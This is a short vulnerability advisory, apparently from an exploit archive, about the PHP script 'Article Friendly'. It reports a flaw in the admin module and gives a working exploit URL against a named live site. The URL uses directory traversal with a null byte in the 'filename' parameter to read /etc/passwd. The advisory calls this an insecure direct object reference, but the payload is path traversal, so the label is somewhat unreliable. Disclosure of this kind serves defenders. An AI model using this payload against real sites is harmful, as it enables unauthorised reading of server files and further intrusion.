=======================================================================
  
                          Article friendly Insecure direct object Referece Vulnerability

                     =======================================================================
  
                                                     by
  
                                               Pratul Agrawal

  
  
  # Vulnerability found in- Admin module
  
  # email         Pratulag@yahoo.com
  
  # company       aksitservices
  
  # Credit by     Pratul Agrawal
 
  # Site p4ge     http://www.articlefriendly.com/
 
  # Plateform     php
 
  
  
  # Proof of concept   #

  Targeted URL:  http://www.familyfriendsphotos.com/admin/index.php?filename=adminlogin
 


             .        .................................................................................................................
 
 Exploit URL -  http://www.familyfriendsphotos.com/admin/index.php?filename=../../../../../../../../../../etc/passwd%00
 
 
             .         .................................................................................................................
 
 
 #If you have any questions, comments, or concerns, feel free to contact me.